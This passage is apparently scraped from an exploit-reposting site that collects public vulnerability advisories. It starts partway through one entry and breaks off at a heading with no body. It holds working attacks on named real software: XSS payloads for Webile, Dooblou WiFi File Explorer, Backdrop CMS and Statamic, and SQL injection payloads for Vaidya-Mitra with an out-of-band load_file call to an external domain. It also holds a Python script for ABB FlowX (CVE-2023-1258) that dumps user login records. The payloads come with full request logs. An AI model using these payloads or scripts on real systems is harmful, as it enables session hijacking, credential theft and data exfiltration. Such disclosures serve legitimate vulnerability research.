path=/; httponly Content-Length: 242 Connection: Keep-Alive Content-Type: application/json - https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; - GET: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Vary: Accept-Encoding Content-Length: 7866 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - Vulnerable Source: asset-manager/albums/[ID] <li data-album="36"> <a href="#albums/20"> <div> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> <p class='count'><span>0</span> assets</p> </div> </a> </li> </iframe></p></div></a></li></ul></div></div> </div> <div id="b-assets-view-asset-container"></div> <div id="b-assets-view-selection-container"></div> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"> <div class="heading"> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> </div> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
HireHackking

Webile v1.0.1 - Multiple Cross Site Scripting

HACKER · %s · %s

Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID (VL-ID): ==================================== 2321 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. Affected Product(s): ==================== Product Owner: Webile Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-11: Researcher Notification & Coordination (Security Researcher) 2022-10-12: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] new_file_name [+] i Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: Send Send message to phone listing <div class="layui-colla-item"> <div class="layui-card-header">Message</div> <div class="layui-colla-content" style="display:block;padding-left:16px;"> <div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br> <span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div> </div></div></div> history logs messages <table class="layui-table layui-form"> <thead><tr> <th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th> <th style="border-right-width:1px;">Message</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead> <tbody><tr> <td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"> <input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div> </td> <td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td> <td align="center">2022/07/17 20:10</td> <td class="td-manage" style="border-right-width:1px;text-align:center;"> <a title="Copy" onclick="copy(3)" href="javascript:;"> <i class="iconfont">&nbsp;&nbsp;</i> </a> <a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"> <i class="layui-icon">&nbsp;&nbsp;</i> </a></td></tr></tbody></table> --- PoC Session Logs #1 (POST) --- (Add) http://localhost:8080/file_action Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 210 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Connection: keep-alive Content-Length: 0 - Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 --- PoC Session Logs #2 (POST) --- (Send) http://localhost:8080/send Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Date: Sun, 17 Jul 2022 18:08:33 GMT Connection: keep-alive Content-Length: 0 Security Risk: ============== The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.
HireHackking

Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

HACKER · %s · %s

#Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2317 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2317 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. Affected Product(s): ==================== Product Owner: dooblou Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-19: Researcher Notification & Coordination (Security Researcher) 2022-01-20: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the front- & backend of the wifi explorer. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Proof of Concept (PoC): ======================= The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue. PoC: Exploitation http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a> http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3 http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX Vulnerable Sources: Execution Points <table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;"><table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl e style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"> <tbody><tr><td><span class="doob_medium_text">Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a href="/">>>&nbsp;Back To Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br> - <li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr> <td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"> <input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td> <table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold"> &nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I - <td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp; <a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td> <td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table> ---PoC Session Logs --- http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml - http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: treeview=0 Upgrade-Insecure-Requests: 1 GET: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html - http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Security Risk: ============== The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.
HireHackking

Vaidya-Mitra 1.0 - Multiple SQLi

HACKER · %s · %s

## Title: Vaidya-Mitra 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 07.12.2023 ## Vendor: https://mayurik.com/ ## Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `useremail` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' was submitted in the useremail parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker easily can steal all information from this system, like login credentials, phone numbers and etc. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: useremail (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gHln'='gHln&userpassword=rootadmin Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html) ## Time spend: 00:27:00
HireHackking

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) #Application: Backdrop Cms #Version: v1.25.1 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://backdropcms.org/ #Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== 1. login to account 2. go to http://localhost/backdrop/?q=admin/config/system/site-information 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/backdrop/files/malas_2.svg) Request POST /backdrop/?q=admin/config/system/site-information HTTP/1.1 Host: localhost Content-Length: 2116 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/backdrop/?q=admin/config/system/site-information Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E Connection: close ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_name" My Backdrop Site ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_slogan" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_mail" admin@admin.com ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_logo_path" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_favicon_upload]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_favicon_path" core/misc/favicon.ico ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_frontpage" home ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_403" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_404" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_build_id" form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_token" siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40 ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_id" system_site_information_settings ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="op" Save configuration ------WebKitForm
HireHackking

ABB FlowX v4.00 - Exposure of Sensitive Information

HACKER · %s · %s

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258 #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests # Set the request parameter url = sys.argv[1] def dump_users(): response = requests.get(url) # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text) exit() # Decode the xml response into dictionary and use the data data = response.text soup = BS(data, features="xml") logs = soup.find_all("log") for log in logs: test = re.search('User (.*?) logged in',str(log)) if test: print(test.group(0)) def main(): dump_users() if __name__ == '__main__': main()
HireHackking

Statamic 4.7.0 - File-Inclusion

HACKER · %s · %s

## Title: Statamic 4.7.0 - File-Inclusion ## Author: nu11secur1ty ## Date: 07.13.2023 ## Vendor: https://statamic.com/ ## Software: https://demo.statamic.com/ ## Reference: https://portswigger.net/web-security/file-upload ## Description: The statamic-4.7.0 suffers from file inclusion - file upload vulnerability. The attacker can upload a malicious HTML file and can share the malicious URL which uses the infected HTML file to the other attackers in the network, they easily can look at the token session key and can do very dangerous stuff. ## Staus: HIGH Vulnerability [+]Exploit: ```js <html> <script> alert(document.cookie); </script> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html) ## Time spend: 01:10:00
HireHackking

Blackcat Cms v1.4 - Remote Code Execution (RCE)

HACKER · %s · %s

